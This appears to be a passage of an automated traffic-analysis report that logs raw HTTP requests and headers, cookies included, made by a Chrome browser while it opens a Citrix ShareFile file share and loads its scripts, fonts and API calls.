AWSALBTG=2dyrk+eHGqjxaMZki/jAkAp9WAnlQ69iTr8oehRCGa2fasUIPcYKj17/MWhvVYOFg7kDjYoTq5H/pCr0LU3Tn+1RaQnUGN38HtZJcMdLm48H9be7gOJMPDSLhsr7A9ut3Rm7+t+tVJFv5EDxncwzCbWNwFNLL/9gJ5ifxMgfXRMzDVisA3NjfdYZ98c+ozfYsRqNDT3wCfXIBwywJ0YSrXx7X21wUMfu/q9PzHaBKKIDlQLLbIsJMCH3Znn6oqjy; AWSALBTGCORS=2dyrk+eHGqjxaMZki/jAkAp9WAnlQ69iTr8oehRCGa2fasUIPcYKj17/MWhvVYOFg7kDjYoTq5H/pCr0LU3Tn+1RaQnUGN38HtZJcMdLm48H9be7gOJMPDSLhsr7A9ut3Rm7+t+tVJFv5EDxncwzCbWNwFNLL/9gJ5ifxMgfXRMzDVisA3NjfdYZ98c+ozfYsRqNDT3wCfXIBwywJ0YSrXx7X21wUMfu/q9PzHaBKKIDlQLLbIsJMCH3Znn6oqjy; AWSALB=dPRCy5pYH/kInPl6xFTDgOJ5/ca6Yo8YzMc8obxdCKiKDIpg9vpPJSNkB2vabxI9JTp/pgvNVbug5nH+ct31uARBlaE0iq8Qgk+VUQuou6KQzbXn0n/8NscVAgmW; AWSALBCORS=dPRCy5pYH/kInPl6xFTDgOJ5/ca6Yo8YzMc8obxdCKiKDIpg9vpPJSNkB2vabxI9JTp/pgvNVbug5nH+ct31uARBlaE0iq8Qgk+VUQuou6KQzbXn0n/8NscVAgmW
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/af15e31c70fab7cfd55c.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/402b74053d26323596b3.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sf/v3/Items/ContentViewer HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=KZq73L718/ezZ8/QNfvJ/RIk9/t+lVZgMvcKOhQ7f4aarQyO5xd4B+0nJpjSTpe16x+dIv/+TLU7SH/7VTG92ClzvQ6bgoH3yn0mHx523Y8qypqvArTZNJovr/VXIcAUnSkEcU1Y7kSIxU/c27UlrgX6G3xc8Tu6qZMjh0Ay28sg; AWSALB=ideWRbTXKvHPcgYV3Gueu7WtSUIet9ouNH5pK6QT1DvRR7f0A81ya/e8RYNkSXisPLFdeu/eTW+61PhpaS90cYTgxWt7MXjkjPvgaxFTbDN5AhneZ+pdTxsHIKDb; AWSALBTGCORS=ff8OczRre+n3okP25paUkM8pooAvVEv4ESWD0qFiP571Qm76kP+wwQ/r4FuqV1G0Njg7bG2odk8J+ArB4HrrBSFXxqHjl0nyAXXWmSIt60gO/eBVTrYE9Ctm82Cs3IC12lkpm6auidXJs70TYTofZY9OsnNGO6uDHzcDYFtn4tlx; AWSALBCORS=dDhoLKZPI3vuwJcXEW6phh5MoetygPUwqjlQDVOug6SOCklzg9l/GANhFzik2fTR/91ufy+k4Lok6kySDC/munwPgx/ijNyHFkFg6NFvfIgOUzPOXAifEcpa5Y4Y
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(fi7c69b7-afa8-169e-2e8d-7376d428783d)?canCreateRootFolder=false&fileBox=false HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveCorrelationId: l_kDyTEZzxwVVnYPVf9slQsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMzYjk2YzE3MzYwY2Q0M2U3YmRjYWYyNWEyMzcwOWZkMCIsIkV4cGlyZXMiOjE3MzA4MzcxOTJ9.wTd-fIjFO8_GgBbOwguJGQ4qxSnkx6LEIZGymUqSPnAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALBCORS=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824
Source: global trafficHTTP traffic detected: GET /sf/v3/Capabilities HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveCorrelationId: pSsArwawC0I21GEOm4AYqQsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALBCORS=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)?%24expand=Items&includeExpired=false HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveCorrelationId: rp8V60VP09_Q-FJJ_sybOQsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMzYjk2YzE3MzYwY2Q0M2U3YmRjYWYyNWEyMzcwOWZkMCIsIkV4cGlyZXMiOjE3MzA4MzcxOTJ9.wTd-fIjFO8_GgBbOwguJGQ4qxSnkx6LEIZGymUqSPnAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALBCORS=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824
Source: global trafficHTTP traffic detected: GET /service/contentviewer/launchrequest HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(fi7c69b7-afa8-169e-2e8d-7376d428783d)?canCreateRootFolder=false&fileBox=false HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALB=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824; AWSALBTGCORS=1hZZQ4QO1R47TYAmOX+mBJvQAnPbnL/cnGXrDKuYHlTJorz8L3H7JfUyTpb3ZNHZxvSzsx8YFQz4pLYYZAzp9XU07aK5FUv1dCgeIh/af3f68WTZa8V/3d+jVhU1OTfMgdzVxNKsAKB/ntmBCDsOAzGmixliwjmOvTV480gxXWzc; AWSALBCORS=mu4F+NzAVhL9gK+BH7aTKX/6MYCsepsD5rjucEutixE/pFWNcTcRr929EA+GMPCMhTNwi+uInPhiaRXOTmwW3oBbGLkVDhcB/CIFmgSmfsbSAtr84quthiFLhId4
Source: global trafficHTTP traffic detected: GET /sf/v3/Capabilities HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALB=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824; AWSALBTGCORS=m3f2SVspjsUZIZoXJX0OsWf9mflbucQIHZYSTbAgotfetjyR1TV3kemJX/gZROmnowZhwHm8s6hGXgezyRgHwCmFOwkXBtlwAyC2igEJV0kqjjooJSGai1QZk3Feqqn0iyBAu5x2FZim+uiT6nfjhdSvaO4m6zvSUjfulHYPaDMp; AWSALBCORS=BE55EhxG5nVFpjJ/u1TZ6mKqVbrk2g+J2BO9r41WDw4CWt0fdnKeh7joy5gBxupr2tOl0BZlqWQeUGdR+d43Y8TncB0qb9FSBsgEfLoDWTgoEC2Z/ORqjqv73N88
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)?%24expand=Items&includeExpired=false HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=+IauWyoLRxalI0A/4CE0PsAOHdH9w4f9e4q+I7ArxmyfaKJ23VcCQpBZ8bmFXmPf3J/fOeUwnk31bAKSVDW/KsyEyfA7S5Gx1dDOF9fahAsoS8/f8fXWySp+m2uHsx7uJRobI+SvaVda9HUVjZSLDK/jQcDEBDqhg60E78DMxgOC; AWSALB=5K2xCKytgEDrXf19O8KSAaZNUTy7Fo9dPKEtzw6IUqCQxmx0dlfRFqC13o6jE/hi1OUA44lAcZMNqt26gGjiTu5Rj85HouldaNkriaQuNEam4p98l40MhfqSA824; AWSALBTGCORS=vlNBes8wXiVQqXacIU1R0tIStgBf7kyd3ey7siypHigAMKOcXbZLvyyEKMwUt1QLSdp0KwYMzxUfEEj4Mt5HrPNw8R/l2J949ScPyHwnihM/+FyGpK8icmMN4by1JHQOkGMpO9SmuIeG3YmNBNweFC5GBJQuoSK6wCODIc1PXJlL; AWSALBCORS=y77yu9c4CMs45pvIoeZO4mSNq/sZt90eoc5WhY+kwPErwidad2PXGl/CnqeKkJ44NCQZFjvvqRm2gSyhYO3BOAL2cKZAKZbQZeD5BlyBkmVfQ0XGEjQFvs+7z7hT
Source: global trafficHTTP traffic detected: GET /bundles/ba7dfd1a6326f1b75478.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=0dB5Y+Th7WKsXTDjvr/yxhXL//OmjpQTw60MO4z37DlhX/ivAuhD8Gm0nhKUTFuL3u7bBvIHqqEMrV+u1V8tty83G3Mz/h5UXNqIZblCD5LA7GcEcZ5Cy4LXNgbD8dbgdVq4qoUGYZu7gn5EIZhO47poakmzNMVHx9Gk1oZE8DkU+IODSYs2Rn/QvHPFvoWJEpZeUzsITMS7kflajWSbeIC1UJMMzxxelLdrg+F2qcnqnFlVki9S1BnMnF1g4n79; AWSALBTGCORS=0dB5Y+Th7WKsXTDjvr/yxhXL//OmjpQTw60MO4z37DlhX/ivAuhD8Gm0nhKUTFuL3u7bBvIHqqEMrV+u1V8tty83G3Mz/h5UXNqIZblCD5LA7GcEcZ5Cy4LXNgbD8dbgdVq4qoUGYZu7gn5EIZhO47poakmzNMVHx9Gk1oZE8DkU+IODSYs2Rn/QvHPFvoWJEpZeUzsITMS7kflajWSbeIC1UJMMzxxelLdrg+F2qcnqnFlVki9S1BnMnF1g4n79; AWSALB=TafDt1fvVrlBCSuFiTLhl/spLq+n7xw7c771/F/dqieG730uhdEu5h2nFee8B/gJyXq8CcZH5xYQqyVoaGxpBmBVlaC3QM5jR+pB+1ZLtvKDpdraGyrwpfsl3uJ4; AWSALBCORS=TafDt1fvVrlBCSuFiTLhl/spLq+n7xw7c771/F/dqieG730uhdEu5h2nFee8B/gJyXq8CcZH5xYQqyVoaGxpBmBVlaC3QM5jR+pB+1ZLtvKDpdraGyrwpfsl3uJ4
Source: global trafficHTTP traffic detected: GET /bundles/ba7dfd1a6326f1b75478.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALBTGCORS=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALB=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv; AWSALBCORS=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv
Source: global trafficHTTP traffic detected: GET /bundles/2efeefafc2bb68a97d33.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALBTGCORS=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALB=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv; AWSALBCORS=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv
Source: global trafficHTTP traffic detected: GET /bundles/b5bef5c91ec3b83469e0.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALBTGCORS=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALB=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv; AWSALBCORS=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv
Source: global trafficHTTP traffic detected: GET /bundles/d178f6eceb0126b1e292.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; 